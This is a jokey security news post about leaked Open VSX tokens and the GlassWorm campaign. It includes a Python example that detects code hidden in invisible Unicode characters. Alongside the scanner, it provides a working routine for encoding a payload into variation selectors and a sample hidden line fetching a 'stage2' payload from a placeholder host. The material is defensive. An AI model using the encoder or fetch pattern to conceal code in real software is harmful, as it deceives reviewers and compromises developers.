Open VSX Token Tango: Malicious Extensions Unleashed in Comedic Supply Chain Flop

The Open VSX registry had to rotate access tokens after extension developers accidentally leaked them, allowing threat actors to publish malicious extensions under legitimate names. The leaked tokens fed a campaign dubbed “GlassWorm,” which hid its malicious code in invisible Unicode characters: the payload is present in the file but renders as nothing in an editor or a diff, so it sails past a casual code review. Thankfully, the Open VSX team acted swiftly, containing the threat faster than a squirrel on espresso.


Hot Take:

It’s as if the Open VSX registry decided to pull an Oprah: “You get a token! You get a token! Everybody gets a token!” Unfortunately, this wasn’t a feel-good episode, but a supply chain drama with more plot twists than a daytime soap! Open VSX, you had one job: keep those tokens secret and safe, not turn them into party favors for hackers!

Key Points:

  • Open VSX tokens leaked, allowing threat actors to publish malicious extensions.
  • 550 secrets were exposed, leading to a significant supply-chain risk.
  • The GlassWorm campaign targeted developer credentials and cryptocurrency wallets.
  • The Open VSX registry has since contained the threat and rotated affected tokens.
  • Security measures are being enhanced to prevent future attacks.
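The invisible-Unicode trick behind GlassWorm is easy to check for once you know what to look for. Below is an added example in Python (not Open VSX or GlassWorm code): it shows how a payload can be carried in Unicode variation selectors, that the tainted file is indistinguishable from the clean one once those characters are dropped, and a scanner that flags every run of invisible code points with its line and column so a reviewer or CI job can catch it. The byte-to-variation-selector encoding, the sample extension source and the payload string are constructed assumptions for the demonstration; the page does not spell out GlassWorm's exact encoding.

```python
"""Spot source code smuggled in invisible Unicode characters.

Added example for this page, not Open VSX or GlassWorm code. The byte-to-
variation-selector encoding below is an ASSUMED illustration of how a payload
can be hidden; the page does not describe GlassWorm's exact scheme.
"""
import unicodedata
from typing import NamedTuple

# Code points that render as nothing in editors, terminals and diff viewers.
VS_LOW = (0xFE00, 0xFE0F)        # Variation Selectors 1-16
VS_HIGH = (0xE0100, 0xE01EF)     # Variation Selectors 17-256
TAGS = (0xE0000, 0xE007F)        # Unicode "tag" characters
ZERO_WIDTH = {0x00AD, 0x200B, 0x200C, 0x200D, 0x2060, 0xFEFF}


def is_invisible(ch: str) -> bool:
    """True if ch is a character a reviewer cannot see in rendered source."""
    cp = ord(ch)
    if VS_LOW[0] <= cp <= VS_LOW[1] or VS_HIGH[0] <= cp <= VS_HIGH[1]:
        return True
    if TAGS[0] <= cp <= TAGS[1] or cp in ZERO_WIDTH:
        return True
    # Catch-all: any other "format" character (category Cf, e.g. bidi
    # controls) has no business inside a JavaScript extension.
    return unicodedata.category(ch) == "Cf"


def encode_hidden(payload: bytes) -> str:
    """ASSUMED smuggling scheme: one byte -> one variation selector."""
    return "".join(
        chr(VS_LOW[0] + b) if b < 16 else chr(VS_HIGH[0] + b - 16)
        for b in payload
    )


def decode_hidden(text: str) -> bytes:
    """Recover the bytes carried by variation selectors in text."""
    out = bytearray()
    for ch in text:
        cp = ord(ch)
        if VS_LOW[0] <= cp <= VS_LOW[1]:
            out.append(cp - VS_LOW[0])
        elif VS_HIGH[0] <= cp <= VS_HIGH[1]:
            out.append(cp - VS_HIGH[0] + 16)
    return bytes(out)


class Finding(NamedTuple):
    line_no: int      # 1-based line
    col: int          # 0-based code-point offset of the first hidden char
    count: int        # number of consecutive hidden code points
    sample: str       # first few code points, for the report


def _finding(line_no: int, start: int, run: list[str]) -> Finding:
    sample = " ".join(f"U+{ord(c):04X}" for c in run[:4])
    return Finding(line_no, start, len(run), sample)


def scan_source(text: str) -> list[Finding]:
    """Return every run of invisible code points, with location and length."""
    findings: list[Finding] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        run: list[str] = []
        start = 0
        for col, ch in enumerate(line):
            if is_invisible(ch):
                if not run:
                    start = col
                run.append(ch)
            elif run:
                findings.append(_finding(line_no, start, run))
                run = []
        if run:
            findings.append(_finding(line_no, start, run))
    return findings


def visible_text(text: str) -> str:
    """What a reviewer actually sees: the source with hidden chars removed."""
    return "".join(ch for ch in text if not is_invisible(ch))


# Constructed sample: a harmless-looking extension entry point, and the same
# file with a payload appended to line 1 in variation selectors.
CLEAN_SOURCE = 'const version = "1.0.0";\nmodule.exports = { activate };\n'
HIDDEN_PAYLOAD = b'fetch("https://example.invalid/stage2")'   # constructed
_first, _rest = CLEAN_SOURCE.split("\n", 1)
TAINTED_SOURCE = _first + encode_hidden(HIDDEN_PAYLOAD) + "\n" + _rest

if __name__ == "__main__":
    print("clean file findings :", scan_source(CLEAN_SOURCE))
    for f in scan_source(TAINTED_SOURCE):
        print(f"tainted file: line {f.line_no} col {f.col}: "
              f"{f.count} hidden code points ({f.sample} ...)")
    print("looks identical once stripped:",
          visible_text(TAINTED_SOURCE) == CLEAN_SOURCE)
    print("recovered payload:", decode_hidden(TAINTED_SOURCE).decode())
```

To use it on a real extension, feed `scan_source(open(path, encoding="utf-8").read())` every `.js`/`.ts` file in the package and treat any non-empty result as something to open in a hex viewer; the category-Cf catch-all deliberately also flags bidi control characters, since those are the other classic way to make reviewed source lie about what it does.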

The Nimble Nerd